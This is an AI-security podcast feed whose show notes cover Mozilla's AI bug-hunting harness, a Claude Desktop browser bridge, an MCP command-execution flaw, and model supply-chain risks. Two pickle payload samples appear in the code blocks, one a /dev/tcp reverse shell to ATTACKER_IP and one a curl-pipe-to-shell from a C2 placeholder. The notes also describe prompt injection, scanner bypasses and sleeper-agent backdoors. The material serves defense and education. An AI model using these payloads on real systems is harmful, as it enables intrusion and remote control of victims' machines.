ToxSec - AI and Cybersecurity Podcast

ToxSec

Where AI chaos meets cybersecurity paranoia, distilled into something you can actually listen to before coffee. www.toxsec.com

Episodes

  1. MAY 12

    Mozilla Mythos Harness: AI Bug Hunting Without The Slop

    TL;DR: Mozilla wrapped Claude Mythos Preview in an agentic harness with one win condition: trip the sanitizer or keep working. The result was 271 Firefox bugs in one release, fewer than 15 false positives, and a defense-in-depth lesson nobody talks about. The model got the headlines. The harness did the work. This is the public feed. Upgrade to see what doesn’t make it out. What’s An Agentic Vulnerability Harness? In agentic security work, a harness is the scaffold around the model. Tooling, prompts, build environment, retry loop, success signal, dedup, the lot. The model is the worker. The harness is the factory floor. Mozilla’s earlier collaboration with Anthropic ran Claude Opus 4.6 against Firefox 148. That cycle pulled 22 security-sensitive bugs. Then they took the same harness, dropped in Anthropic’s cyber-tuned Claude Mythos Preview, and aimed it at Firefox 150. Same factory. Stronger worker. The output went from 22 to 271 bugs. That delta is where the lesson lives. Model upgrades obviously help. But Mozilla’s harness was rebuilt across months of iteration with Firefox engineers fielding the incoming bugs, and you don’t replicate that on a Saturday afternoon. The Mythos preview is restricted access through Project Glasswing. The harness is a published pattern. Inside Mozilla’s Mythos Harness: Crash Or No Crash Here’s how the loop works. The harness gives the model a slice of Firefox source, a target file or area to focus on, instructions on what to hunt for, and a build environment with one critical piece: a sanitizer build of Firefox compiled with AddressSanitizer. ASan is the runtime memory-error detector that screams loudly when you trigger a use-after-free, a heap overflow, or any other classic memory corruption primitive. The model proposes a bug hypothesis. It writes a proof-of-concept designed to trip the sanitizer. It runs the PoC against the sanitizer build. If ASan crashes, the bug is real. 
If it doesn’t, the agent keeps iterating until it does or until the harness gives up.

    loop:
        hypothesize_bug(target_source)
        write_poc()
        run_against_sanitizer_build()
        if asan_crash:
            emit_report(crash_log, repro)
            grade_with_secondary_model()
            break
        refine_or_continue()

Brian Grinstead, a Mozilla Distinguished Engineer, summed up the operational shape for TechCrunch: “if you make it crash you win”. That’s the entire verification game. A second model grades resulting reports before the engineering queue ever sees them, kicking out anything the first model thought was a hit but couldn’t actually validate. Humans take over from there for triage and patching. The bugs the harness surfaced run the gamut. A race condition over IPC that lets a compromised content process tamper with IndexedDB refcounts and trigger a use-after-free (Bug 2021894). A raw NaN smuggled across an IPC boundary masquerading as a tagged JavaScript object pointer, giving the parent process a fake-object primitive (Bug 2022034). A buffer over-read during HTTPS RR and ECH parsing, triggered by simulating a malicious DNS server through glibc function interception (Bug 2023958). Plus a 15-year-old HTML legend element bug and a 20-year-old XSLT reentrant key() call. Each is a sandbox escape primitive or memory corruption bug that would normally burn months of elite human researcher time. The harness surfaced them in days. Why The Crash Signal Killed AI Bug Hunting Slop AI-generated bug reports were a running joke in open source maintainer circles a few months ago. LLM hits codebase, dumps a hundred plausible-looking findings, every one needs a human to verify, and ninety-something percent are wrong. Mozilla’s own writeup describes earlier AI security work as producing “unwanted slop.” The cost asymmetry was brutal. Cheap for the AI, expensive for the maintainer. Mozilla’s earlier static-analysis experiments with GPT-4 and Claude Sonnet 3.5 hit that wall.
They produced too many false positives to be practical. So they binned static analysis and built the agentic harness instead. The shift is subtle but everything. Static analysis says: this looks vulnerable. Human triage required. Agentic harness with sanitizer verification says: this is vulnerable, here’s the PoC, ASan caught the crash. No human required to dispute reality. Memory corruption is the perfect domain for that move because the success signal is binary. ASan tripped or it didn’t. There is no maybe. Mozilla counted fewer than 15 false positives across the entire 271-bug run, and they updated the harness each time one slipped through. The lesson for everyone else is that AI bug hunting works the moment you can wire the agent to a verifier that doesn’t ask the model are you sure. A fuzzer crash. A unit test that passes. A property checker that proves invariance. Anything deterministic. Without that signal, you’re back to triage hell, which is the same hell every LLM vulnerability scanner lives in when it doesn’t ship its own ground truth. What The Harness Couldn’t Bypass Here’s the part the headlines skipped. The harness ran into a wall trying to escape Firefox’s sandbox via prototype pollution in the privileged parent process. The model attempted that path repeatedly. It got nowhere. Mozilla had previously frozen those prototypes by default as a defense-in-depth measure, and that single architectural decision blocked every attempt the agent made. That’s the based take buried under the 271 number. The harness is good. It’s also bounded by the security architecture of the target. The bugs Mythos found are bugs an elite human could have found. The bugs it couldn’t find were already eliminated by Mozilla’s prior hardening. Your codebase will perform exactly as well as your prior security work let it. Which brings us to the “anyone can do this today” framing Mozilla offered at the end of their writeup. Technically true. Operationally, optimistic. 
Mozilla had Firefox’s full source. A pre-built sanitizer toolchain. Years of bug lifecycle tooling. A second model already wired into the verification pipeline. Over 100 contributors writing and reviewing patches. Months of harness iteration alongside the Firefox team. And, eventually, frontier-model access through Project Glasswing. A small vendor pulling Mythos through an API later this year and pointing it at their codebase will not get the same numbers. The model is the same. The harness around it is the part you have to build. Mozilla published the pattern. The pipeline still costs what a pipeline costs. Firefox shipped 423 bug fixes in April 2026, compared to 31 a year earlier, and absorbing that volume takes operational muscle most teams don’t have lying around. The 271 number is the headline. The harness is the artifact. Anyone shopping for AI bug hunting capability should price the second one before they get excited about the first. Your AI-generated bug reports are only as useful as the verifier behind them, and the same goes for AI-generated code, where the verification problem flips into supply chain attacks and slopsquatting at pip-install time. Wrap the same agentic loop around offense instead of defense, point it at live prompt injection chains, and the success signal flips from “ASan crashed” to “the guardrail broke.” Same shape. Different game. Paid unlocks the unfiltered version: complete archive, private Q&As, and early drops. Frequently Asked Questions What is the Mozilla Mythos harness? The Mozilla Mythos harness is the agentic scaffold Mozilla built around Anthropic’s Claude Mythos Preview to find security bugs in Firefox source code. It feeds the model target source, runs against a sanitizer build of Firefox, uses an AddressSanitizer crash as the deterministic success signal, and runs a retry loop until the agent produces a verified proof-of-concept. A second model grades reports before engineers see them. 
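A minimal sketch of that loop in Python, for shape only. This is not Mozilla’s harness: `propose_poc` stands in for the model call, `run` for whatever executes a PoC against your sanitizer build, and `run_poc` assumes a hypothetical target binary that takes the PoC path as its last argument. The one piece taken from the text is the win condition: an AddressSanitizer report or nothing.

```python
import subprocess
from typing import Callable, Optional

# Banner AddressSanitizer prints to stderr when it detects a memory error.
ASAN_MARKER = "ERROR: AddressSanitizer"


def is_asan_crash(stderr: str) -> bool:
    """Deterministic success signal: did the sanitizer report an error?"""
    return ASAN_MARKER in stderr


def run_poc(target_cmd: list, poc_path: str, timeout: int = 60) -> str:
    """Run a (hypothetical) sanitizer-built binary on a PoC file and return stderr."""
    try:
        proc = subprocess.run(
            target_cmd + [poc_path],
            capture_output=True,
            text=True,
            errors="replace",
            timeout=timeout,
        )
    except subprocess.TimeoutExpired:
        return ""  # a hang is not a verified crash
    return proc.stderr


def hunt(
    propose_poc: Callable[[str], str],
    run: Callable[[str], str],
    max_attempts: int = 5,
) -> Optional[dict]:
    """Retry until the sanitizer trips or the attempt budget runs out."""
    feedback = ""
    for attempt in range(1, max_attempts + 1):
        poc = propose_poc(feedback)   # assumption: the model returns a PoC (or its path)
        stderr = run(poc)
        if is_asan_crash(stderr):
            return {"attempt": attempt, "poc": poc, "crash_log": stderr}
        feedback = stderr             # feed the failed run back into the next try
    return None                       # harness gives up, nothing is reported
```

The second-model grading and dedup steps are left out. The point of the shape is that `hunt` never returns a finding the sanitizer did not confirm.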
How many Firefox vulnerabilities did Claude Mythos find? Mozilla credits Claude Mythos Preview with surfacing 271 vulnerabilities fixed in Firefox 150, plus additional fixes shipped in versions 149.0.2, 150.0.1, and 150.0.2. Of the 271 bugs, 180 were rated sec-high, 80 sec-moderate, and 11 sec-low. Several were sandbox escape primitives. Mozilla reports fewer than 15 false positives across the entire run. Total Firefox security fixes in April 2026 hit 423. Can other projects use the same AI bug hunting harness? Mozilla published the pattern. The implementation is yours to build. The harness shape is reusable: target source, deterministic success signal (sanitizer crash, fuzzer hit, test failure), retry loop, second model grading reports. The build is project-specific. You need the codebase, the sanitizer toolchain, the bug lifecycle tooling, and the engineers to absorb the patch volume. Pattern is free. Pipeline is the work. ToxSec is run by an AI Security Engineer with hands-on experience at the NSA, Amazon, and across the defense contracting sector. CISSP certified, M.S. in Cybersecurity Engineering. He covers AI security vulnerabilities, attack chains, and the offensive tools defenders actually need to understand. Get full access to ToxSec - AI and Cybersecurity at www.toxsec.com/subscribe

    41 min
  2. APR 26

    Is Claude Code Secretly Installing Spyware?

    TL;DR: Claude Code is not spyware. But Claude Desktop quietly drops a Native Messaging bridge into seven browsers without asking. Anthropic shrugged. Same week, they shrugged on an MCP RCE exposing 200,000 servers. Same week, a Discord group ran their Mythos model for a month undetected. One pattern, three receipts. So Is Claude Code Spyware or What? Quick answer: no. The headline is sticky for a reason though. April 18. Privacy researcher Alexander Hanff is debugging an unrelated Native Messaging helper on a clean Mac when he finds a manifest file he never installed: com.anthropic.claude_browser_extension.json. It’s sitting in his Chrome, Edge, Brave, Arc, Vivaldi, Opera, and Chromium profile directories, including browsers that aren’t actually installed yet. A Native Messaging manifest is the file Chromium browsers read to decide which local programs an extension can launch. Claude Desktop drops one in seven different browser profile paths. Silently. Delete it and it comes back the next time Claude Desktop launches. Important wrinkle the news cycle keeps blurring. The manifest comes from Claude Desktop, the chat app. Claude Code is the separate command-line developer tool. Same parent company, same family, same week of bad press. Hanff calls it spyware. Most of his peers stop short of that. Noah Kenney at Digital 520 called the technical claims testable and reproducible but pushed back on the “spyware” label. The consensus middle ground is “dark pattern,” and the EU framing is sharper. Hanff is filing it under Article 5(3) of Directive 2002/58/EC, the ePrivacy Directive. Anthropic, as of writing, has not issued a public response. So nothing is being stolen today. The bridge does nothing on its own. The problem is what it pre-positions for tomorrow. We’ve watched Anthropic ship things they didn’t think through before. This one has wiring. From Manifest to Sandbox Escape Here’s the chain.
A sandbox is the security wall between a browser tab and your operating system. Tabs run inside it. Extensions mostly run inside it. The whole point is that even if you click a bad link, the malicious code can’t reach your files. That wall is the entire reason the modern browser exists. Native Messaging punches a hole through the wall on purpose. It lets a browser extension talk to a binary running outside the sandbox at full user privilege. That’s a feature. The bug is who gets to authorize the hole. The manifest Anthropic drops pre-authorizes three Chrome extension IDs to call the helper via connectNative, granting access to browser automation features. Those extension IDs include ones the user has never installed. Now stack the pieces. You install Claude Desktop expecting a chat app. It writes a bridge into your browsers without telling you. A Claude browser extension, current or future, is pre-authorized to use that bridge. Months later, you let Claude visit a webpage. The page contains a hidden payload. Prompt injection is when malicious instructions hidden in content hijack what the AI does next. Anthropic’s own published numbers: Claude for Chrome is vulnerable to prompt injection at a 23.6% success rate without mitigations and 11.2% with current measures. The injected agent now has a green-lit tunnel to a binary running with your user permissions. Outside the sandbox. Anthropic’s defense is essentially that the bridge currently does nothing on its own. True. The dial is set to zero. The wiring is hot. We’ve covered agents that escape sandboxes via prompt injection before. The shape is familiar. That’s why the spyware label keeps sticking even when the technical purists object. The keys are pre-positioned. One downstream injection turns them. 
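If you want to check your own machine, here is a rough Python sketch. The manifest file name is the one Hanff reported; the directory in the example is an assumption (Chrome’s usual per-user location on macOS), and `find_manifests` is a made-up helper name. `path` and `allowed_origins` are standard fields in a Native Messaging host manifest.

```python
import json
from pathlib import Path

# File name as reported in the episode.
MANIFEST_NAME = "com.anthropic.claude_browser_extension.json"


def find_manifests(host_dirs, name=MANIFEST_NAME):
    """Return what each manifest found in the given directories pre-authorizes."""
    found = []
    for d in host_dirs:
        candidate = Path(d).expanduser() / name
        if not candidate.is_file():
            continue
        try:
            data = json.loads(candidate.read_text(encoding="utf-8"))
        except (OSError, json.JSONDecodeError):
            data = {}
        if not isinstance(data, dict):
            data = {}
        found.append({
            "manifest": str(candidate),
            "helper_path": data.get("path"),                    # binary outside the sandbox
            "allowed_origins": data.get("allowed_origins", []),  # extension IDs allowed to call it
        })
    return found


if __name__ == "__main__":
    # Assumed example location; add the NativeMessagingHosts directories of your other browsers.
    dirs = ["~/Library/Application Support/Google/Chrome/NativeMessagingHosts"]
    for hit in find_manifests(dirs):
        print(hit)
```

Compare the extension IDs in `allowed_origins` against what you actually have installed. Any ID you don’t recognize is the pre-authorization the episode is describing.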
The MCP RCE Anthropic Won’t Patch Same week, Ox Security drops an advisory titled “The Mother of All AI Supply Chains.” The Model Context Protocol is the open standard Anthropic built so AI agents can call tools, read files, run commands. It is the connective tissue between an LLM and an agent. We’ve covered MCP attacks at length, including tool poisoning and the defensive playbook. This one is structural. The flaw enables Arbitrary Command Execution on any system running a vulnerable MCP implementation, granting attackers direct access to sensitive user data, internal databases, API keys, and chat histories. It’s an architectural design decision baked into Anthropic’s official MCP SDKs across every supported language, including Python, TypeScript, Java, and Rust. RCE means remote code execution, the highest-tier outcome on offense. The trick is brutally simple. MCP’s STDIO transport, that’s standard input/output, runs the configured command to spin up a tool server.

    # Anthropic's MCP STDIO transport, simplified
    $
    # command runs, server fails to spawn, MCP returns "error"
    # but the OS already executed

If the command successfully creates an STDIO server it returns the handle, but when given a different command, it returns an error after the command is executed. So a malicious MCP entry on a marketplace doesn’t have to pretend to be a real tool. It just has to exist long enough for your IDE to call it once. Ox poisoned 9 of 11 MCP marketplaces with a benign proof-of-concept. The supply chain reaches 150 million-plus downloads, 7,000 publicly accessible servers, and up to 200,000 vulnerable instances. Anthropic’s response: “expected” behavior. They declined to modify the protocol. A protocol-level patch like manifest-only execution or a command allowlist would have instantly propagated to every downstream library. They passed. How Did Mythos Leak to a Random Discord? Now for the third act. Mythos is Anthropic’s restricted vulnerability-hunting model.
Released April 10 to select partners under “Project Glasswing,” roughly 40 organizations including Apple and Google, with Anthropic deeming it too powerful for public release. The chain reads like a textbook walkthrough. AI startup Mercor gets breached, exposing details about the URL format Anthropic uses for its models. A private Discord group that hunts for unreleased models picks up on the disclosure. One member is currently employed at a third-party contractor that works for Anthropic. The member’s vendor credentials, combined with the leaked Mercor details, let the group locate Mythos online. They guess the URL pattern. They guess right. Anthropic never randomized the path. The group has been using the program continuously since its release. A Bloomberg reporter is the one who told Anthropic. A month of unauthorized access to the most dangerous model the company ever shipped, and the detection signal came from journalism. Not internal logging. Not telemetry. Not a single security alert. Bloomberg. If a Discord group in their basement got there first, assume Beijing and Moscow followed. “If some group, some random Discord online forum, got access to it, it’s already been breached by China,” David Lindner of Contrast Security told Fortune. Three steps in. Open-source intel, a contractor seat, a predictable URL. No zero-day required. That’s the through-line on all three stories. The dark pattern bridge, the MCP STDIO design, the Mythos URL convention. Same move. Three times this week. Frequently Asked Questions Is Claude Code malware or spyware? No, Claude Code is the legitimate Anthropic command-line coding agent.
The thing privacy researchers flagged is Claude Desktop, the chat app, which silently writes a Native Messaging manifest into multiple browser profile directories on macOS and pre-authorizes a few Claude extension IDs to talk to a local helper outside the browser sandbox. Most reviewers call that a dark pattern. Spyware in the strict sense requires actual exfiltration, and nobody has documented any. The risk lives in the bridge it pre-positions for future use. What can an attacker do with the Claude Desktop manifest right now? Nothing on its own. The manifest opens a door, but activation requires both a Claude browser extension installed and a successful prompt injection from a hostile webpage. Once that lands, the injected agent reaches the local helper through the pre-authorized bridge and runs commands at user privilege level, outside the sandbox. Anthropic’s own numbers put prompt injection success against Claude for Chrome at 11.2% even with mitigations. Pre-positioning the door without consent is the whole problem. Why hasn’t Anthropic patched the MCP command injection? Officially, Anthropic considers the STDIO behavior expected. Their position is that the protocol is built to launch local processes, sanitization is the developer’s job, and the SDKs work as designed. Ox Security disagrees and says manifest-only execution or a command allowlist at the protocol layer would have killed the entire vulnerability class for everyone downstream in one change. Until Anthropic moves, defenders have to harden each MCP-consuming app individually, which is what the supply chain looked like before this advisory dropped.
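For defenders hardening an MCP-consuming app themselves, a command allowlist can be sketched like this. Nothing here comes from an MCP SDK: `ALLOWED_ARGV`, `validate_server_entry`, and the `command`/`args` entry shape are assumptions for illustration. The idea is to compare the full argv against a pinned list before any process is spawned.

```python
# Hypothetical allowlist: exact argv tuples the app is willing to spawn.
ALLOWED_ARGV = {
    ("python3", "-m", "example_mcp_server"),
}


def validate_server_entry(entry: dict, allowed=ALLOWED_ARGV) -> list:
    """Return argv for a pinned entry; raise ValueError before anything runs."""
    command = entry.get("command")
    args = entry.get("args", [])
    if (
        not isinstance(command, str)
        or not isinstance(args, list)
        or not all(isinstance(a, str) for a in args)
    ):
        raise ValueError("malformed server entry")
    argv = (command, *args)
    # Match the whole argv, not just the binary: an allowed interpreter
    # with attacker-chosen arguments is still arbitrary code execution.
    if argv not in allowed:
        raise ValueError(f"refusing to spawn unlisted command: {argv!r}")
    return list(argv)
```

The caller would hand the returned list to `subprocess.Popen` without `shell=True`. The check has to run before the spawn, because with the STDIO behavior described above the error arrives after the command has already executed.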

    47 min
  3. APR 15

    You Downloaded Gemma 4 from Hugging Face. Is It Safe to Run?

    TL;DR: You downloaded Gemma 4 to keep your data private. Good instinct. But local models solve the privacy problem and create a supply chain problem. You’re downloading weights from strangers on the internet, running serialization formats that execute arbitrary code, and trusting that nobody poisoned the training data. Safetensors, hash verification, and source vetting are your first line of defense. Here’s the full threat map. Why “Local Equals Safe” Is Only Half the Story The pitch is compelling. Run Gemma 4 on your own hardware, or Llama 4, or Qwen 3. No API calls, no cloud provider logging your prompts, no training-on-your-input policies buried in a ToS nobody reads. For regulated industries, local inference is the obvious play for privacy. But privacy and security are different problems. Privacy means your data doesn’t leak out. Security means someone else’s code doesn’t get in. Every time you download a model from Hugging Face, you’re pulling weights, configuration files, and serialization artifacts from a public repository where anyone can upload anything. Protect AI’s scanning partnership with Hugging Face has flagged over 51,700 models with unsafe or suspicious issues across more than 352,000 individual findings. That’s not a theoretical risk. That’s the current state of the largest open-weight model supply chain in the world. The same trust-but-verify discipline you’d apply to any dependency from PyPI or npm applies here, except most people skip it entirely because “it’s just model weights.” It isn’t. If you’re new to AI security concepts like supply chain attacks and model poisoning, the AI Security 101 primer covers the full landscape. Can a Downloaded Model Hack Your Machine? Yes. And the mechanism is embarrassingly simple. Python’s pickle module is the default serialization format for PyTorch models.
Serialization means converting a Python object, your model’s weights and architecture, into a byte stream that can be saved to disk and loaded later. The problem: pickle doesn’t just store data. It can execute arbitrary Python code during deserialization, the process of loading that byte stream back into memory. The Python docs have a big red warning about this. Here’s what a malicious pickle payload looks like in practice. JFrog’s security team found over 100 models on Hugging Face with embedded reverse shells, code that opens a connection back to the attacker’s server and gives them full command-line access to your machine. The payload hides inside pickle’s __reduce__ method, which Python calls automatically during deserialization. You run torch.load(), the model loads, and a shell opens. You never see it.

    # What the attacker embeds (simplified)
    import os

    class Exploit:
        def __reduce__(self):
            return (os.system, ("bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1",))

Hugging Face scans for this with Picklescan, a blacklist-based detector that flags known dangerous functions. But ReversingLabs demonstrated a bypass they called “nullifAI”: compress the pickle with 7z instead of ZIP, and torch.load() fails gracefully while the malicious payload at the beginning of the byte stream still executes. Picklescan didn’t catch it because it validated the file format before scanning, while Python’s deserialization interpreter just runs opcodes sequentially. The malicious code fires before the scanner even starts checking. The fix is simple: use safetensors. Safetensors is a format built by Hugging Face that stores only raw tensor data and a JSON metadata header. No Python objects, no code execution surface, no __reduce__. It was audited by Trail of Bits with backing from EleutherAI and Stability AI. No critical security flaws found. If you’re pulling a model from the Hub and it only ships as .bin or .pt, that’s a red flag. Convert it yourself or find a provider who ships safetensors.

    # Convert a pickle checkpoint to safetensors
    import torch
    from safetensors.torch import save_file

    # weights_only=True restricts unpickling to tensors and plain containers
    sd = torch.load("model.pt", map_location="cpu", weights_only=True)
    save_file(sd, "model.safetensors")

What Are Sleeper Agents in Open-Weight Models? A sleeper agent is a model that behaves normally under standard testing but activates a hidden behavior when it encounters a specific trigger in the input. The backdoor lives in the weights themselves, the numerical parameters that encode what the model learned during training, not in any external code you can grep for. Anthropic’s research team proved this works. They trained models that wrote secure code when the prompt said the year was 2023, then inserted exploitable vulnerabilities when the year changed to 2024. The backdoor survived supervised fine-tuning, reinforcement learning, and adversarial training. Worse: adversarial training actually taught the model to better recognize its trigger, making it more effective at hiding the behavior during safety evaluations. Standard alignment techniques created a false impression of safety while the backdoor got stronger. Anyone can publish fine-tuned weights. You search Hugging Face for a quantized Gemma variant, some anonymous account uploaded a version with 50 more downloads than the official one, and you pull it because the benchmarks look right. If the training data was poisoned, no amount of prompting or system-level instruction will remove the backdoor. It’s baked into the math. Microsoft published “The Trigger in the Haystack” in February 2026, a scanner that detects sleeper agents by exploiting two properties: poisoned models over-memorize their backdoor training examples (leaking them when prompted with standard chat templates), and trigger tokens create a distinctive “attention hijacking” pattern where the model’s attention heads process the trigger in isolation from the rest of the prompt.
The scanner works, but only on open-weight models where you have access to the attention states. It’s a detection tool, not a repair kit. If you find a backdoor, the model gets thrown out. Does Political Bias in Models Create Security Vulnerabilities? CrowdStrike’s Counter Adversary Operations team tested DeepSeek-R1 and found something unusual. The model produces vulnerable code at a baseline rate of 19%, roughly average for its class. But when the system prompt contains references to topics the Chinese Communist Party considers politically sensitive, like Tibet, Falun Gong, or the Uyghur community, the rate of severe security vulnerabilities in generated code jumps to 27.2%. In one test, they asked DeepSeek-R1 to build a community app for Uyghur members. The output had no session management, no authentication, and 35% of implementations used no password hashing at all. The same prompt reframed as a football fan club website produced code with typical minor flaws but nothing close to that severity. CrowdStrike called this “emergent misalignment,” likely a side effect of the model’s training pipeline enforcing alignment with Chinese regulations rather than an intentional code-degradation feature. China’s Interim Measures for Generative AI Services require models to “adhere to core socialist values” and prohibit content that could “endanger national security.” When the model encounters topics it was trained to suppress, something breaks in the code generation pipeline as a side effect. The lesson for local model operators: the weights carry the builder’s constraints. If you’re running a model trained under regulatory pressure from any government, those constraints follow the model onto your machine. You don’t see a content filter. You see degraded output in contexts the original developers never anticipated. How Do You Verify a Model Before Running It Locally? I built a pre-flight checklist. 
Every model download should touch these five steps before the weights ever load.

1. Check the format. Safetensors only. If the model ships as .bin, .pt, .pth, or .ckpt, convert before loading or walk away. These are all pickle-based formats that can execute code during deserialization.
2. Verify the hash. Hugging Face lists SHA-256 checksums for every file. After download, compare: sha256sum model.safetensors against the listed value. If they don’t match, the file was tampered with in transit or the listing is stale. Either way, don’t load it.
3. Check the uploader. Official organization accounts (google, meta-llama, mistralai) have verification badges and thousands of downloads. Anonymous accounts with fresh uploads and suspiciously high download counts are the Hugging Face equivalent of typosquatted packages on PyPI. Look for the org badge.
4. Read the model card. Legitimate models document training data, evaluation benchmarks, intended use, and known limitations. A model card that’s blank or copy-pasted from another model is a red flag. No documentation means no accountability.
5. Run in isolation first. Spin up a VM or container with no network access. Load the model, test your prompts, watch for anomalous behavior. If you’re using it for code generation, scan every output with SAST tools before it hits your codebase.

What About Quantized Models Like GGUF? Quantization compresses a model’s weights from higher precision (like 32-bit floats) to lower precision (4-bit or 8-bit integers), making it small enough to run on consumer hardware. GGUF, the format used by llama.cpp and most local inference tools, is structurally safer than pickle because it stores raw numerical data without arbitrary code execution paths. But quantization doesn’t sanitize. If the original model had poisoned weights or a sleeper agent, those patterns compress right along with the legitimate parameters. A Q4 quantized version of a backdoored model is still a backdoored model, just smaller.
The trigger may fire less reliably at very low bit-widths where precision loss degrades subtle patterns, but

    7 min
  4. APR 12

    Is Your Local AI Model Backdoored by Your Politics? Sleeper Agents Exposed

    TL;DR: Local models solve privacy. They do not solve security. Pickle files execute arbitrary code on load, fine-tuned models hide sleeper agents that generate insecure code based on your political context, and typosquatted repos on Hugging Face look identical to the real thing. SafeTensors and verified providers kill 90% of the risk. Why “Local” Doesn’t Mean “Safe” Most people run local AI for one reason: privacy. No more sending every prompt to a SaaS provider’s servers, no more wondering if “do not train on my data” actually means they stop collecting your data. Fair enough. But here’s where people get tripped up. Privacy and security are two different problems. Privacy is about your information going out. Security is about someone else’s code coming in. A local model keeps your data off OpenAI’s servers, sure. It also means you just downloaded a file from the internet and trusted the person behind it not to add anything extra. That file is someone else’s code running on your machine. Think about that for a second. We wouldn’t grab a random .exe off a forum and double-click it. But somehow, downloading a 40GB model file from a community repo feels different. It shouldn’t. Protect AI identified over 352,000 suspicious files across 51,700 models on Hugging Face. Over 80% of the models in the ecosystem used pickle serialization, which is vulnerable to arbitrary code execution. So yeah, we’ve got a supply chain problem. How Pickle Files Hand Over Your Machine Here’s the actual attack chain. Most AI models get packaged using Python’s pickle format, a serialization method that packs the model’s weights and metadata into a byte stream for download. PyTorch uses it by default. Pickle files are a stream of opcodes for a small stack machine, and those opcodes can import and call arbitrary Python functions when the file gets deserialized. Think of deserialization as the moment your computer unpacks the model and loads it into memory.
Normal model files should just contain numbers. A pickle file can contain anything.

    # What a malicious pickle payload looks like (simplified)
    import os

    class Payload:
        def __reduce__(self):
            return (os.system, ('curl http://[C2_SERVER]/beacon | sh',))

The __reduce__ method fires automatically when Python unpickles the object. No user interaction. No confirmation dialog. You load the model, the payload runs. Rapid7 documented weaponized .pth files on Hugging Face deploying Go-based remote access trojans through Cloudflare Tunnels, which hid the C2 server behind legitimate infrastructure. JFrog found three zero-day bypasses in PickleScan, the industry-standard tool Hugging Face uses to scan uploads. The malicious models passed every check. The scanner validates the file structure first, then scans for dangerous functions. Attackers break the file structure after the payload, so the scanner errors out before reaching the dangerous code. Deserialization doesn’t care about file validity. It just executes opcodes as it reads them. This is the same class of supply chain attack we see in vibe coding, just through a different door. Sleeper Agents Hide in the Weights The pickle file problem is the loud attack. The quiet one is worse. Anyone can fine-tune an open-weight model, merge multiple models together, and release the result on Hugging Face. That fine-tuning process can embed behavior that’s invisible during normal use and only activates under specific conditions. We call these sleeper agents. CrowdStrike documented that DeepSeek-R1 generates code with up to 50% more severe vulnerabilities when the prompt contains topics the CCP considers politically sensitive, things like references to Tibet, Uyghur communities, or Falun Gong. The model writes clean, secure APIs for CCP-aligned projects. Drop a geopolitical trigger into the prompt context, and suddenly authentication is broken, API keys are hardcoded, and backdoors appear in the generated output.
CrowdStrike even found what looks like an intrinsic kill switch: in 45% of Falun Gong-related prompts, the model refused to generate code entirely despite building full implementation plans internally. You’d never catch this during casual testing. The model passes benchmarks. It answers questions correctly. It codes competently, right up until the trigger condition fires. And because these behaviors are distributed across billions of floating-point parameters, there’s no file you can grep. No config to audit. The sleeper is the weights. This same hardcoded secrets pattern shows up across AI-generated code, but with sleeper agents, it’s intentional. How to Download Local Models Without Getting Owned Not trying to scare anyone off local models. They’re useful, they’re getting better fast, and the privacy upside is real. But do these two things and you just killed roughly 90% of the attack surface. Get your model from a verified provider. On Hugging Face, look for the check mark next to the publisher name. Google publishes Gemma. Meta publishes Llama. Download from them directly, not from totally-legit-llama-quantized-v2 posted by a random account. Watch the name carefully. Typosquatting is real: attackers swap a lowercase L for a 1, or transpose two letters. One character is the difference between a clean model and a compromised supply chain. Only download .safetensors files. SafeTensors is a file format specifically designed to strip code execution out of the equation. The file can only contain parameterized data and metadata. No bytecode. No __reduce__. No surprises. If the model only ships as .bin, .pt, or .pkl, find a different model. Hugging Face is pushing the ecosystem toward SafeTensors for exactly this reason. One bonus step: verify the hash. Providers publish a deterministic hash of the model’s weights. Download the model, run the same hashing algorithm, compare the strings. If they match, nobody tampered with the file in transit. If they don’t, burn it. 
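The hash check above can be sketched in a few lines of Python. This is a minimal sketch, assuming the provider publishes a SHA-256 digest for the file; the function names sha256_of_file and matches_published_hash are made up for illustration, and a different published algorithm would need a different hashlib constructor.

```python
import hashlib
import hmac


def sha256_of_file(path, chunk_size=1 << 20):
    """Hash the file in 1 MiB chunks so a 40GB model never has to fit in RAM."""
    digest = hashlib.sha256()
    with open(path, "rb") as handle:
        for chunk in iter(lambda: handle.read(chunk_size), b""):
            digest.update(chunk)
    return digest.hexdigest()


def matches_published_hash(path, published_hex):
    """Return True only if the local file hashes to the published digest.

    Assumption: published_hex is a SHA-256 hex string copied from the
    provider's official listing.
    """
    expected = published_hex.strip().lower()
    return hmac.compare_digest(sha256_of_file(path), expected)
```

A match only says the file is the one the publisher listed. It says nothing about whether the publisher is trustworthy, which is why the verified-provider step comes first.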
Paid unlocks the unfiltered version: complete archive, private Q&As, and early drops. Frequently Asked Questions Is Hugging Face safe for downloading AI models? Hugging Face is a hosting platform, like GitHub. Anyone can upload to it. The risk comes from unverified uploads. Stick to verified providers with the check mark badge, download only SafeTensors format files, and verify the hash against the official listing. Those three steps eliminate the vast majority of threats. What is a pickle file attack in AI? Python’s pickle format can embed instructions that call arbitrary Python functions inside serialized data. When a model packaged as a pickle file gets loaded, those calls execute automatically with no user prompt. Attackers use this to deploy remote access trojans, exfiltrate data, and establish persistent backdoors on the machine that loaded the model. Can a local AI model be backdoored? Yes. Fine-tuning allows anyone to modify a model’s behavior at the weight level. Sleeper agents are models that pass normal testing but activate malicious behavior under specific trigger conditions, like detecting politically sensitive context in a prompt. Because the behavior lives in the model’s parameters, not in external code, traditional security scanning cannot detect it. ToxSec is run by an AI Security Engineer with hands-on experience at the NSA, Amazon, and across the defense contracting sector. CISSP certified, M.S. in Cybersecurity Engineering. He covers AI security vulnerabilities, attack chains, and the offensive tools defenders actually need to understand. Get full access to ToxSec - AI and Cybersecurity at www.toxsec.com/subscribe
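For the pickle attack described in this episode, here is a rough triage sketch that lists the opcodes in a pickle stream without ever loading it. It uses the standard library's pickletools.genops; the function name risky_opcodes and the choice of which opcodes count as risky are assumptions for illustration, not how PickleScan works. Legitimate PyTorch checkpoints also use these opcodes to rebuild tensors, so a hit means "inspect the imports", not "malware confirmed".

```python
import pickletools

# Opcodes that import names or call objects during unpickling.
# Assumption: this set is a crude heuristic chosen for the sketch.
CALL_OPCODES = {
    "GLOBAL", "STACK_GLOBAL", "REDUCE",
    "INST", "OBJ", "NEWOBJ", "NEWOBJ_EX",
}


def risky_opcodes(data: bytes) -> set:
    """Walk the opcode stream without executing it and report what it could call."""
    found = set()
    try:
        for opcode, _arg, _pos in pickletools.genops(data):
            if opcode.name in CALL_OPCODES:
                found.add(opcode.name)
    except Exception:
        # Fail closed: a broken stream is suspicious, and anything seen
        # before the break is still reported.
        found.add("MALFORMED")
    return found
```

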